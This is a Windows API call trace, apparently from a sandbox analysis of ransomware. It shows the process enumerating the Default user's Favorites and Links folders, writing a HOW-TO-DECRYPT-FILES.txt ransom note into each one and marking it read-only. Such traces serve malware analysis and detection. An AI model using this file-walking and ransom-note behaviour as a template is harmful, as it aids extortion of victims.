lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.783] GetLastError () returned 0x5 [0048.783] SetErrorMode (uMode=0x1) returned 0x0 [0048.783] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.783] GetLastError () returned 0x5 [0048.784] SetErrorMode (uMode=0x0) returned 0x1 [0048.784] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", lpFilePart=0x0) returned 0x36 [0048.784] GetLastError () returned 0x5 [0048.784] SetErrorMode (uMode=0x1) returned 0x0 [0048.784] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), fInfoLevelId=0x0, lpFileInformation=0x1c11f88 | out: lpFileInformation=0x1c11f88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.784] GetLastError () returned 0x5 [0048.784] SetErrorMode (uMode=0x0) returned 0x1 [0048.785] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.785] GetLastError () returned 0x5 [0048.785] SetErrorMode (uMode=0x1) returned 0x0 [0048.785] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.785] GetLastError () returned 0x5 [0048.786] SetErrorMode (uMode=0x0) returned 0x1 [0048.786] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url", lpFilePart=0x0) returned 0x2f [0048.786] GetLastError () returned 0x5 [0048.786] SetErrorMode (uMode=0x1) returned 0x0 [0048.786] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), fInfoLevelId=0x0, lpFileInformation=0x1c2ff80 | out: lpFileInformation=0x1c2ff80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.786] GetLastError () returned 0x5 [0048.786] SetErrorMode (uMode=0x0) returned 0x1 [0048.786] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.786] GetLastError () returned 0x5 [0048.786] SetErrorMode (uMode=0x1) returned 0x0 [0048.787] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.787] GetLastError () returned 0x5 [0048.788] SetErrorMode (uMode=0x0) returned 0x1 [0048.788] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", lpFilePart=0x0) returned 0x36 [0048.788] GetLastError () returned 0x5 [0048.788] SetErrorMode (uMode=0x1) returned 0x0 [0048.788] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), fInfoLevelId=0x0, lpFileInformation=0x1c4df48 | out: lpFileInformation=0x1c4df48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.788] GetLastError () returned 0x5 [0048.788] SetErrorMode (uMode=0x0) returned 0x1 [0048.788] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.788] GetLastError () returned 0x5 [0048.788] SetErrorMode (uMode=0x1) returned 0x0 [0048.788] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.788] GetLastError () returned 0x5 [0048.789] SetErrorMode (uMode=0x0) returned 0x1 [0048.790] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x27 [0048.790] GetLastError () returned 0x5 [0048.790] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.790] GetLastError () returned 0x5 [0048.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.790] GetLastError () returned 0x5 [0048.790] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x27 [0048.790] GetLastError () returned 0x5 [0048.790] SetErrorMode (uMode=0x1) returned 0x0 [0048.790] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.797] GetLastError () returned 0x5 [0048.797] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.797] GetLastError () returned 0x5 [0048.797] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.797] GetLastError () returned 0x5 [0048.797] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.798] GetLastError () returned 0x5 [0048.798] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.798] GetLastError () returned 0x5 [0048.798] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.798] GetLastError () returned 0x5 [0048.798] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.798] GetLastError () returned 0x12 [0048.798] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.799] SetErrorMode (uMode=0x0) returned 0x1 [0048.799] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x27 [0048.799] GetLastError () returned 0x12 [0048.799] SetErrorMode (uMode=0x1) returned 0x0 [0048.799] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.800] GetLastError () returned 0x12 [0048.800] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.800] GetLastError () returned 0x12 [0048.800] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.800] GetLastError () returned 0x12 [0048.800] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.800] GetLastError () returned 0x12 [0048.800] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.800] GetLastError () returned 0x12 [0048.800] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.800] GetLastError () returned 0x12 [0048.800] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.800] GetLastError () returned 0x12 [0048.800] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.801] SetErrorMode (uMode=0x0) returned 0x1 [0048.801] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url", lpFilePart=0x0) returned 0x3c [0048.801] GetLastError () returned 0x12 [0048.801] SetErrorMode (uMode=0x1) returned 0x0 [0048.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), fInfoLevelId=0x0, lpFileInformation=0x1c6d834 | out: lpFileInformation=0x1c6d834*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2917cd46, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.802] GetLastError () returned 0x12 [0048.802] SetErrorMode (uMode=0x0) returned 0x1 [0048.802] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.802] GetLastError () returned 0x12 [0048.802] SetErrorMode (uMode=0x1) returned 0x0 [0048.802] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.803] GetLastError () returned 0x0 [0048.803] GetFileType (hFile=0x184) returned 0x1 [0048.803] SetErrorMode (uMode=0x0) returned 0x1 [0048.803] GetFileType (hFile=0x184) returned 0x1 [0048.803] WriteFile (in: hFile=0x184, lpBuffer=0x1c895cc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1c895cc*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.804] GetLastError () returned 0x0 [0048.804] CloseHandle (hObject=0x184) returned 1 [0048.804] GetLastError () returned 0x0 [0048.804] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.804] GetLastError () returned 0x0 [0048.804] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.804] GetLastError () returned 0x0 [0048.804] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url", lpFilePart=0x0) returned 0x40 [0048.804] GetLastError () returned 0x0 [0048.804] SetErrorMode (uMode=0x1) returned 0x0 [0048.805] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x1c8b280 | out: lpFileInformation=0x1c8b280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2917cd46, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.805] GetLastError () returned 0x0 [0048.805] SetErrorMode (uMode=0x0) returned 0x1 [0048.805] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.805] GetLastError () returned 0x0 [0048.805] SetErrorMode (uMode=0x1) returned 0x0 [0048.805] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.805] GetLastError () returned 0x5 [0048.806] SetErrorMode (uMode=0x0) returned 0x1 [0048.806] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url", lpFilePart=0x0) returned 0x3d [0048.806] GetLastError () returned 0x5 [0048.806] SetErrorMode (uMode=0x1) returned 0x0 [0048.806] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), fInfoLevelId=0x0, lpFileInformation=0x1ca91ac | out: lpFileInformation=0x1ca91ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29156be6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.806] GetLastError () returned 0x5 [0048.806] SetErrorMode (uMode=0x0) returned 0x1 [0048.807] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.807] GetLastError () returned 0x5 [0048.807] SetErrorMode (uMode=0x1) returned 0x0 [0048.807] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.807] GetLastError () returned 0x5 [0048.808] SetErrorMode (uMode=0x0) returned 0x1 [0048.808] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url", lpFilePart=0x0) returned 0x3f [0048.808] GetLastError () returned 0x5 [0048.808] SetErrorMode (uMode=0x1) returned 0x0 [0048.808] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), fInfoLevelId=0x0, lpFileInformation=0x1cc70c0 | out: lpFileInformation=0x1cc70c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29156be6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.808] GetLastError () returned 0x5 [0048.808] SetErrorMode (uMode=0x0) returned 0x1 [0048.808] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.808] GetLastError () returned 0x5 [0048.808] SetErrorMode (uMode=0x1) returned 0x0 [0048.808] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.809] GetLastError () returned 0x5 [0048.809] SetErrorMode (uMode=0x0) returned 0x1 [0048.810] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links", lpFilePart=0x0) returned 0x16 [0048.810] GetLastError () returned 0x5 [0048.810] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.810] GetLastError () returned 0x5 [0048.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.810] GetLastError () returned 0x5 [0048.810] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links", lpFilePart=0x0) returned 0x16 [0048.810] GetLastError () returned 0x5 [0048.810] SetErrorMode (uMode=0x1) returned 0x0 [0048.810] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.818] GetLastError () returned 0x5 [0048.818] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.818] GetLastError () returned 0x5 [0048.818] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.818] GetLastError () returned 0x5 [0048.818] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.818] GetLastError () returned 0x5 [0048.818] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.818] GetLastError () returned 0x5 [0048.818] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.818] GetLastError () returned 0x5 [0048.818] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.818] GetLastError () returned 0x12 [0048.818] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.819] SetErrorMode (uMode=0x0) returned 0x1 [0048.819] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links", lpFilePart=0x0) returned 0x16 [0048.819] GetLastError () returned 0x12 [0048.819] SetErrorMode (uMode=0x1) returned 0x0 [0048.819] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.820] GetLastError () returned 0x12 [0048.820] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.820] GetLastError () returned 0x12 [0048.820] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.820] GetLastError () returned 0x12 [0048.820] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.820] GetLastError () returned 0x12 [0048.820] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.820] GetLastError () returned 0x12 [0048.820] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.820] GetLastError () returned 0x12 [0048.820] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.820] GetLastError () returned 0x12 [0048.820] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.821] SetErrorMode (uMode=0x0) returned 0x1 [0048.821] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\desktop.ini", lpFilePart=0x0) returned 0x22 [0048.821] GetLastError () returned 0x12 [0048.821] SetErrorMode (uMode=0x1) returned 0x0 [0048.821] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce64b4 | out: lpFileInformation=0x1ce64b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x280f9488, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0048.822] GetLastError () returned 0x12 [0048.822] SetErrorMode (uMode=0x0) returned 0x1 [0048.823] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0048.823] GetLastError () returned 0x12 [0048.823] SetErrorMode (uMode=0x1) returned 0x0 [0048.823] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.823] GetLastError () returned 0x0 [0048.823] GetFileType (hFile=0x184) returned 0x1 [0048.823] SetErrorMode (uMode=0x0) returned 0x1 [0048.823] GetFileType (hFile=0x184) returned 0x1 [0048.823] WriteFile (in: hFile=0x184, lpBuffer=0x1d01e6c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1d01e6c*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.824] GetLastError () returned 0x0 [0048.824] CloseHandle (hObject=0x184) returned 1 [0048.824] GetLastError () returned 0x0 [0048.824] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0048.824] GetLastError () returned 0x0 [0048.824] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.824] GetLastError () returned 0x0 [0048.824] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x22 [0048.824] GetLastError () returned 0x0 [0048.824] SetErrorMode (uMode=0x1) returned 0x0 [0048.824] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x1d03ad8 | out: lpFileInformation=0x1d03ad8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x28087067, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1d3)) returned 1 [0048.825] GetLastError () returned 0x0 [0048.825] SetErrorMode (uMode=0x0) returned 0x1 [0048.825] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0048.825] GetLastError () returned 0x0 [0048.825] 